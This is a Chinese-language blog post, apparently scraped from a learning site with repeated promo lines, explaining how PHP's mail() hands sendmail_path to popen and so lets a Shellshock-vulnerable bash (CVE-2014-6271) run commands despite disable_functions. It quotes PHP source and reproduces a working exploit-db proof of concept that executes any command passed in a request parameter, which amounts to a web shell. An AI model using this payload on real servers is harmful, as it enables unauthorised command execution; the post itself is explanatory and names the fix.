PHP Execute Command Bypass Disable

先简单说一下php调用mail()函数的过程。 看到源码ext/mail.c 236行： char *sendmail_path = INI_STR("sendmail_path"); char *sendmail_cmd = NULL; 从INI中获得sendmail_path变量。我们看看php.ini里是怎么说明的： ; For Unix only.You may supply argume

稿定抠图

AI自动消除图片背景

80

查看详情

立即学习“PHP免费学习笔记（深入）”；

先简单说一下php调用mail()函数的过程。 
看到源码ext/mail.c 

236行： 
char *sendmail_path = INI_STR("sendmail_path"); <br>char *sendmail_cmd = NULL;

从INI中获得sendmail_path变量。我们看看php.ini里是怎么说明的： 

; For Unix only.  You may supply arguments as well (default: "sendmail -t -i"). <br>;sendmail_path =

注释中可以看到，send_mail默认值为”sendmail -t -i”. 

立即学习“PHP免费学习笔记（深入）”；

立即学习“PHP免费学习笔记（深入）”；

立即学习“PHP免费学习笔记（深入）”；

立即学习“PHP免费学习笔记（深入）”；

立即学习“PHP免费学习笔记（深入）”；

立即学习“PHP免费学习笔记（深入）”；

立即学习“PHP免费学习笔记（深入）”；

立即学习“PHP免费学习笔记（深入）”；

立即学习“PHP免费学习笔记（深入）”；

extra_cmd（用户传入的一些额外参数）存在的时候，调用spprintf将sendmail_path和extra_cmd组合成真正执行的命令行sendmail_cmd 。不存在则直接将sendmail_path赋值给sendmail_cmd 。 
如下： 
if (!sendmail_path) { <br>#if (defined PHP_WIN32 || defined NETWARE) <br>    /* handle old style win smtp sending */ <br>    if (TSendMail(INI_STR("SMTP"), &tsm_err, &tsm_errmsg, hdr, subject, to, message, NULL, NULL, NULL TSRMLS_CC) == FAILURE) { <br>      if (tsm_errmsg) { <br>        php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", tsm_errmsg); <br>        efree(tsm_errmsg); <br>      } else { <br>        php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", GetSMErrorText(tsm_err)); <br>      } <br>      MAIL_RET(0); <br>    } <br>    MAIL_RET(1); <br>#else <br>    MAIL_RET(0); <br>#endif <br>  } <br>  if (extra_cmd != NULL) { <br>    spprintf(&sendmail_cmd, 0, "%s %s", sendmail_path, extra_cmd); <br>  } else { <br>    sendmail_cmd = sendmail_path; <br>  }

之后执行： 

#ifdef PHP_WIN32 <br>  sendmail = popen_ex(sendmail_cmd, "wb", NULL, NULL TSRMLS_CC); <br>#else <br>  /* Since popen() doesn't indicate if the internal fork() doesn't work <br>   * (e.g. the shell can't be executed) we explicitly set it to 0 to be <br>   * sure we don't catch any older errno value. */ <br>  errno = 0; <br>  sendmail = popen(sendmail_cmd, "w"); <br>#endif

将sendmail_cmd丢给popen执行。 
如果系统默认sh是bash，popen就会丢给bash执行。

而之前的bash破壳（CVE-2014-6271）漏洞，直接导致我们可以利用mail()函数执行任意命令，绕过disable_functions。 

影响版本：php 各版本 

修复方法：修复CVE-2014-6271 

给出POC（http://www.exploit-db.com/exploits/35146/）如下： 

<?php <br /># Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions) <br># Google Dork: none <br># Date: 10/31/2014 <br># Exploit Author: Ryan King (Starfall) <br># Vendor Homepage: http://php.net <br># Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror <br># Version: 5.* (tested on 5.6.2) <br># Tested on: Debian 7 and CentOS 5 and 6 <br># CVE: CVE-2014-6271 <br><br>function shellshock($cmd) { // Execute a command via CVE-2014-6271 @mail.c:283 <br>   $tmp = tempnam(".","data"); <br>   putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1"); <br>   // In Safe Mode, the user may only alter environment variableswhose names <br>   // begin with the prefixes supplied by this directive. <br>   // By default, users will only be able to set environment variablesthat <br>   // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive isempty, <br>   // PHP will let the user modify ANY environment variable! <br>   mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actuallysend any mail <br>   $output = @file_get_contents($tmp); <br>   @unlink($tmp); <br>   if($output != "") return $output; <br>   else return "No output, or not vuln."; <br>} <br>echo shellshock($_REQUEST["cmd"]); <br>?>

立即学习“PHP免费学习笔记（深入）”；

立即学习“PHP免费学习笔记（深入）”；

【本文来源：http://www.leavesongs.com/PHP/php-bypass-disable-functions-by-CVE-2014-6271.html 作者 phith0n】

安全脉搏 » PHP Execute Command Bypass Disable_functions